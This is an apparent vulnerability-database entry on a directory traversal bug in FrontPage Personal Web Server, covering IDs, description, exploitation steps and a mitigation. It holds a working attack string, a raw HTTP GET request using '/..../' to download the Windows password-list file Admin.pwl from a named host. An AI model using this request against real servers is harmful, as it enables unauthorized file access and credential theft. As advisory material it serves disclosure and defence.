Microsoft FrontPage PWS Directory Traversal

Against

FrontPage Personal Web Server on Windows

IDs

CVE: CAN-2000-0153
Bugtraq: 989

Category

Input validation error

Effect

Unauthorized file access

Source

Packetstorm, Bugtraq

Description

Description: Doubledot bug in FrontPage FrontPage Personal Web Server.

Compromise: Accessing drive through browser.

Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not tested.

Details:

When FrontPage-PWS runs a site on your c:\ drive your drive could be = accessed by any user accessing your page, simply by requesting any file = in any directory except the files in the FrontPage dir. specially = /_vti_pvt/.

How to exploit this bug?

Simply adding /..../ in the URL addressbar.

http://www.target.com/....//

so by requesting http://www.target.com/..../Windows/Admin.pwl the = webserver let us download the .pwl file from the target.

Files and dirs. with the hidden attribute set are vulnerable.

Solution:

The best solution is installing FrontPage on a drive that doesn't = contain Private information.

Greetings, Jan van de Rijt aka The Warlock.

Attack string

GET /..../Windows/Admin.pwl HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.2; Linux) (KHTML, like Gecko)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.i-pi.com

Attack program source

None available.